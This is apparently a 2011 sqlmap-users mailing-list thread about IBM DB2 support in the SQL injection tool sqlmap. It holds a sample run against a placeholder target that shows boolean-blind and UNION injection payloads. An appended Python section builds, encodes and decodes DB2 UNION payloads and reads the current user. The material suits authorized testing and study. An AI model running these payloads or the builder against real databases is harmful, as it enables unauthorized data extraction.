Re: [sqlmap-users] IBM DB2 support
From: Bernardo D. A. G. <ber...@gm...> - 2011-08-10 09:31:28
The generic tests are always tested for, regardless of the DBMS identified or the --dbms switch provided.

Bernardo

2011/8/10 Andres Tarascó Acuña <ata...@gm...>:
> Hi,
>
> Is the "--dbms=db2" flag still unsupported? I have tried it; however,
> the checked payloads were:
>
> [20:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [20:44:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [20:44:13] [INFO] testing 'Generic UNION query with Microsoft Access (%00) comment (NULL) - 1 to 10 columns'
>
> I'm not sure if this is currently a bug or just the expected result :?
>
> Thanks.
>
> Andres
>
> 2011/7/6 Bernardo Damele A. G. <ber...@gm...>
>>
>> Hi,
>>
>> Update on IBM DB2 support: the payload for time-based has been added[1]
>> last week, as well as support for direct connection (-d switch).
>>
>> [1] https://twitter.com/#!/sqlmap/status/85659702565937152
>>
>>
>> On 25 June 2011 11:04, Bernardo Damele A. G. <ber...@gm...> wrote:
>> > Hi,
>> >
>> > The long awaited IBM DB2 support has been implemented in sqlmap. The
>> > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH
>> > and merged into the sqlmap repository after some tweaking by us. It is very
>> > stable for both DB2 8.x and 9.x branches.
>> > The patch includes support to fingerprint and enumerate data on IBM
>> > DB2 via boolean-based blind SQL injection and UNION query SQL
>> > injection. Hopefully, soon someone will come up with a payload for
>> > time-based and error-based techniques too. Support for direct
>> > connection to the DBMS (-d switch) will be implemented soon as well.
>> >
>> > Thank you Sebastian and the rest of the team at r-tec for your patch
>> > and support!
>> >
>> > Sample run against an IBM DB2 9.7 test environment:
>> > --8<--
>> > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user
>> >
>> > sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool
>> > http://sqlmap.sourceforge.net
>> >
>> > [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
>> >
>> > [*] starting at 10:56:21
>> >
>> > [10:56:21] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' as session file
>> > [10:56:21] [INFO] testing connection to the target url
>> > [10:56:23] [INFO] heuristics detected web page charset 'ascii'
>> > [10:56:23] [INFO] testing if the url is stable, wait a few seconds
>> > [10:56:25] [INFO] url is stable
>> > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic
>> > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
>> > [10:56:26] [INFO] GET parameter 'id' is dynamic
>> > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: DB2)
>> > [10:56:27] [INFO] testing sql injection on GET parameter 'id'
>> > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
>> > parsed error message(s) showed that the back-end DBMS could be DB2. Do you want to skip test payloads specific for other DBMSes? [Y/n]
>> > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> > [10:56:49] [INFO] target url appears to be UNION injectable with 1 columns
>> > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
>> > GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
>> > sqlmap identified the following injection points with a total of 21 HTTP(s) requests:
>> > ---
>> > Place: GET
>> > Parameter: id
>> >     Type: boolean-based blind
>> >     Title: AND boolean-based blind - WHERE or HAVING clause
>> >     Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh
>> >
>> >     Type: UNION query
>> >     Title: Generic UNION query (NULL) - 1 to 10 columns
>> >     Payload: id=1' UNION ALL SELECT CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM
>> > ---
>> >
>> > [10:58:58] [INFO] testing IBM DB2
>> > [10:58:59] [INFO] confirming IBM DB2
>> > [10:59:12] [INFO] the back-end DBMS is IBM DB2
>> > web server operating system: Windows
>> > web application technology: PHP 5.3.5, Apache 2.2.17
>> > back-end DBMS: active fingerprint: IBM DB2 9.7
>> >                html error message fingerprint: DB2
>> > [10:59:12] [INFO] fetching banner
>> > banner: 'DB2 v9.7.400.501'
>> >
>> > [10:59:13] [INFO] fetching current user
>> > current user: 'TEST'
>> > --8<--
>> >
>> > Bernardo
>> >
>> >
>> > --
>> > Bernardo Damele A. G.
>> >
>> > E-mail / Jabber: bernardo.damele (at) gmail.com
>> > Mobile: +447788962949 (UK 07788962949)
>> > PGP Key ID: Unavailable
>> >
>>
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

--
Bernardo Damele A. G.
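The UNION payload in the sample run above spells its marker string as a CHR(n)||CHR(n)||... chain selected FROM SYSIBM.SYSDUMMY1, wrapped in ':nrr:' / ':eql:' delimiters, and closes the quote context with a random 'QrLM'='QrLM tail after the comment. The following is an added illustration of that construction, written for this page; it is not sqlmap's own code and not from any of the posters. It reproduces the CHR() encoding, pads the SELECT to the detected column count with NULLs, shows how the random token is swapped for an expression such as CURRENT USER during enumeration, and parses the delimited value back out of a response body. The delimiters, token and tail are the ones visible in the page's payload; the generated-token length and the sample HTML body are constructed for the example.

```python
"""Added example: assembling and decoding a DB2 UNION-query marker payload
of the shape shown in the sqlmap sample run (not sqlmap's own code)."""
import re
import secrets
import string

# Delimiters taken from the page's payload (sqlmap randomises them per run).
PREFIX = ":nrr:"
SUFFIX = ":eql:"

# The exact CHR() chain from the page's UNION payload, used here as a fixture.
PAGE_CHR_CHAIN = (
    "CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||"
    "CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||"
    "CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58)"
)


def chr_concat(text):
    """Encode an ASCII string as a DB2 CHR(n)||CHR(n)||... concatenation.

    Spelling the marker this way avoids quote characters inside the
    injected SELECT, so the payload survives quote escaping and filters."""
    if not text.isascii():
        raise ValueError("CHR() encoding here covers ASCII only")
    return "||".join("CHR(%d)" % ord(c) for c in text)


def decode_chr_chain(chain):
    """Inverse of chr_concat(): turn CHR(58)||CHR(110)||... back into text."""
    codes = re.findall(r"CHR\((\d+)\)", chain)
    if "||".join("CHR(%s)" % c for c in codes) != chain:
        raise ValueError("not a pure CHR() concatenation chain")
    return "".join(chr(int(c)) for c in codes)


def detection_column(token=None, prefix=PREFIX, suffix=SUFFIX):
    """Marker column used to confirm UNION injectability: a random token
    between the delimiters, entirely CHR()-encoded (constant, no quotes)."""
    if token is None:  # assumed length; sqlmap's own choice may differ
        token = "".join(secrets.choice(string.ascii_letters) for _ in range(10))
    return chr_concat(prefix + token + suffix)


def enumeration_column(sql_expr, prefix=PREFIX, suffix=SUFFIX):
    """Once injectable, the token is replaced by the expression to read
    (e.g. CURRENT USER for --current-user); only the delimiters stay encoded."""
    return "%s||%s||%s" % (chr_concat(prefix), sql_expr, chr_concat(suffix))


def build_union_payload(base_value, column_count, column_expr, position=0, tail=None):
    """Build value' UNION ALL SELECT ... FROM SYSIBM.SYSDUMMY1-- AND 'x'='x.

    column_count is found by stepping NULL,NULL,... until the page stops
    erroring (the '1 to 10 columns' test); position picks which column is
    rendered in the page; the tail keeps the original quotes balanced even
    though it sits after the '--' comment."""
    if not 0 <= position < column_count:
        raise ValueError("position must lie within column_count")
    if tail is None:
        tail = "".join(secrets.choice(string.ascii_letters) for _ in range(4))
    columns = ["NULL"] * column_count
    columns[position] = column_expr
    return "%s' UNION ALL SELECT %s FROM SYSIBM.SYSDUMMY1-- AND '%s'='%s" % (
        base_value, ",".join(columns), tail, tail)


def extract_marker(body, prefix=PREFIX, suffix=SUFFIX):
    """Pull the delimited value out of an HTTP response body, or None if the
    marker was not rendered (wrong column position, filtered output, etc.)."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(decode_chr_chain(PAGE_CHR_CHAIN))
    print(build_union_payload("1", 1, detection_column("ZgAXBmEJMu"), tail="QrLM"))
    print(build_union_payload("1", 3, enumeration_column("CURRENT USER"), position=1))
    # Constructed sample response, as a page would render the marker column.
    print(extract_marker("<html><td>:nrr:TEST:eql:</td></html>"))
```

Decoding the page's chain yields ':nrr:ZgAXBmEJMu:eql:', i.e. the delimiter, a random token and the closing delimiter, which is what lets the tool locate its own output inside arbitrary HTML. Note that a --dbms=db2 run still sends the generic boolean-based and UNION tests, as the reply above states; only the DBMS-specific payloads are pruned.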